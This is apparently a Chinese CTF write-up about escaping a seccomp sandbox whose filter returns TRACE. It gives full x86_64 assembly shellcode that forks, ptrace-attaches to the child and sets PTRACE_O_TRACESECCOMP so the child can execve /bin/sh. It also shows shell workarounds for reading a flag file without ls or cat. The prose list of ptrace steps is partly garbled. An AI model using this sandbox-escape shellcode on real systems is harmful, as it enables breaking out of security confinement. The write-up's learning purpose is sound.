题目本身并不难 是一道屌丝菜单题 且orw

沙盒的限制如下:

0x01 前言

比赛的时候做的很顺利 本地能拿到flag 用的openat2+rw

但是异地的时候就出问题了 一开始以为是flag昵称的问题 后面经过别的师傅提醒 并且这道题长时间0解 发现没有那么简单

经测试 异地较低版本的内核并不支持openat2的使用 那么我们该如何得到得到flag呢?

0x02 SECCOMP_RET_TRACE

再次观察seccomp,可以发现被排除的调用实际是return TRACE 了,而非常见的KILL,实际上,这个TRACE只要被追踪器捕获,那便可能救回,也就是说,此时seccomp检查不会在系统调用的时候运行,我们能够进行逃逸

更详细的解释

据此 我们可以通过如下的操作进行逃逸主体的思路是

  1. 用fork开子进程,父进程通过ptrace(PTRACE_ATTACH,pid,0,0);来追踪子进程

  2. 然后父进程wait子进程直到子进程发起系统调用被父进程捕捉到

  3. 此时子进程遭到阻塞,父进程继续运行并通过ptrace(PTRACE_0 _SUSPEND_SECCOMP,pid,0,PTRACE_0_TRACESECCOMP); 将被 TRACE 的调用改为允许执行

  4. 最后ptrace(PTRACE SCONT); 来恢复子进程的系统调用执行

最后这道题进行逃逸的shellcode部分如下:

f'''
_start:

    /* Step 1: fork a new process */
    mov rax, 57             /* syscall number for fork (on x86_64) */
    syscall                 /* invoke fork() */

    test rax, rax           /* check if return value is 0 (child) or positive (parent) */
    js _exit                /* if fork failed, exit */

    /* Step 2: If parent process, attach to child process */
    cmp rax, 0              /* are we the child process? */
    je child_process        /* if yes, jump to child_process */

parent_process:
    /* Store child PID */
    mov r8,rax
    mov rsi, r8            /* rdi = child PID */

    /* Attach to child process */
    mov rax, 101            /* syscall number for ptrace */
    mov rdi, 0x10           /* PTRACE_ATTACH */
    xor rdx, rdx            /* no options */
    xor r10, r10            /* no data */
    syscall                 /* invoke ptrace(PTRACE_ATTACH, child_pid, 0, 0) */

monitor_child:
    /* Wait for the child to stop */    
    mov rdi, r8            /* rdi = child PID */
    mov rsi, rsp            /*  no status*/
    xor rdx, rdx            /* no options */
    xor r10, r10            /* no rusage */
    mov rax, 61             /* syscall number for wait4 */
    syscall                 /* invoke wait4() */

    /* Set ptrace options */

    mov rdi, 0x4200         /* PTRACE_SETOPTIONS */
    mov rsi, r8            /* rsi = child PID */
    xor rdx, rdx            /* no options */
    mov r10, 0x00000080     /* PTRACE_O_TRACESECCOMP */
    mov rax, 101            /* syscall number for ptrace */
    syscall                 /* invoke ptrace(PTRACE_SETOPTIONS, child_pid, 0, 0) */

    /* Allow the child process to continue */

    
    mov rdi, 0x7            /* PTRACE_CONT */
    mov rsi, r8            /* rsi = child PID */
    xor rdx, rdx            /* no options */
    xor r10, r10            /* no data */
    mov rax, 101            /* syscall number for ptrace */
    syscall                 /* invoke ptrace(PTRACE_CONT, child_pid, 0, 0) */

    /* Loop to keep monitoring the child */
    jmp monitor_child

child_process:
    /* Child process code here */
    /* For example, we could execute a shell or perform other actions */
    /* To keep it simple, let's just execute `/bin/sh` */
    mov rax, 0x{order}  /* "/bin/sh" */
    push rax
    mov rdi, rsp    
    mov rsi, 0
    xor rdx, rdx
    mov rax, 59             /* syscall number for execve */
    syscall
    jmp child_process

_exit:
    /* Exit the process */
    mov rax, 60             /* syscall number for exit */
    xor rdi, rdi            /* status 0 */
    syscall
'''

0x03 后话

在劫持执行流后,经过如上的操作我们可以得到一个受限的shell ,只能执行cd,pwd,echo等基础的命令

而ls cat等不可行,既然要获得flag,那么我们就需要另寻他法

其中ls可以通过echo *替代

cat可以通过

while IFS= read -r line; do
    echo "$line"
done < flag

替代

END

总而言之是一道很有意思的题目🤨

也不枉赛时被折磨了那么久😢

重生之会pwnのsekiro